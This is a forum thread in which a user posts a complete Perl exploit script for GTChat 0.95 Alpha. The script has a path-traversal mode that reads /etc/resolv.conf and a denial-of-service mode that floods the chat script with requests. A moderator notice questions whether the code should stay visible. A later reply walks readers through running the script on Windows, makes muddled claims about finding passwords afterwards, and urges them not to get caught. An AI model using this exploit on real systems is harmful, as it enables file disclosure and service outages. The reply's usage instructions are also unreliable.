Jump to content
xisto Community
Sign in to follow this  
machinamedia

Gtchat 0.95 Alpha Remote Denial Of Service Expl

Recommended Posts

Here we go...

 

#!/usr/bin/perl  use LWP::Simple;   if (@ARGV < 3){   print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n";   print "sever -  URL chat\n";   print "path  -  path to chat.pl\n";   print "mode  -  poc or dos,\n";   print "                    poc - simple check without DoS and exit,\n";   print "                    dos - DoS, you must set count for requests in 4 argument.\n\n";   exit ();}     $DoS      =     "dos";   $POC      =     "poc";   $server   =  $ARGV[0];   $path     =  $ARGV[1];   $mode     =  $ARGV[2];   $count    =  $ARGV[3];   print qq(                                          ###################################                                          # GTChat <= 0.95 Alpha remote DoS #                                          #   tested on GTChat 0.95 Alpha   #                                          # Šoded by x97Rang 2005 RST/GHC #                                          #    Respect: b1f, 1dt.w0lf, ed   #                                          ################################### );if ($mode eq $POC){     print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n";   $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);     $content = get "$URL";if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/){   print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); }if ($content =~ /Fatal error/){   print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n";   print "=== OUTPUT ===============================================================================\n";   print "\n$content\n";   print & #34;=============================================================================== OUTPUT ===\n";   exit();}else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep \n"; }}if ($mode eq $DoS){if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() }   print "\nSend $count DoS requests to $server...\n";  $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }   print "Done, packets sended.\n";}

Have phun!

 

Notice from cmatcmextra:
Please use codebox tags when posting large amounts of code

Notice from Dooga:

vizskywalker told me that it should not be visible, because the code teaches how to hack using denial of service exploits, and on a computer that's fast enough, could damage an unprotected server. What do you think?


Edited by Dooga (see edit history)

Share this post


Link to post
Share on other sites

Is this thing legal ? ok i know it isnt.
But can those information be posted here on the forum ?
With that code you can hack that GTChat.
i see that machinamedia is advanced member so he probobly know this ;)

So if you need realy to do this on windows you will need a thing called activePerl, i think you can download it here : https://store.activestate.com/?id=ActivePerl

Then when you extract those files somewere like C:\Perl and then go to cmd ( Start > Run > type cmd ) and then type cd C:\Perl\bin\
That code that someone posted above save as something.pl and put it in the same place like ActivePerl C:\Perl
Your still didnt close that cmd window, type perl something.pl [urlofsite] [ip]
[ip] should be 80
then you have command ls -a to lista all the files in the directory of hacked page and find password.
Im sorry if i made a mistake somewere i cant remember all those things. ( didnt do that for a long time )
and if you have linux you would probobly know how to use that code.

have fun and dont let you get cought :)

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.